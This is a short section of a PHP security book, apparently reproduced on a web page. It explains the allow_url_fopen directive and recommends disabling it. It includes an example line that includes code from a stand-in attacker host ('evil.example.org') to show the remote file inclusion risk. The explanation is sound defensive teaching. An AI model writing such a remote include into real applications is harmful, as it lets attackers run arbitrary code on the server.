Section A.1. allow_url_fopen

Previous page
Table of content
Next page

A.1. allow_url_fopen

As illustrated in Chapter 6, the allow_url_fopen directive allows you to reference remote resources as if they are local files:

     <?php     $contents = file_get_contents('http://example.org/xss.html');     ?>

Chapter 5 reveals how dangerous this is when combined with the use of include or require:

     <?php     include 'http://evil.example.org/evil.inc';     ?>

I recommend disabling allow_url_fopen unless your application requires it.



Previous page
Table of content
Next page
Essential PHP Security
Essential PHP Security
ISBN: 059600656X
EAN: 2147483647
Year: 2005
Pages: 110
Authors: Chris Shiflett
BUY ON AMAZON
Java I/O
ERP and Data Warehousing in Organizations: Issues and Challenges
Inside Network Security Assessment: Guarding Your IT Infrastructure
MySQL Clustering
The Complete Cisco VPN Configuration Guide
Cisco IOS Cookbook (Cookbooks (OReilly))
flylib.com © 2008-2017.
If you may any questions please contact us: flylib@qtcs.net
Privacy policy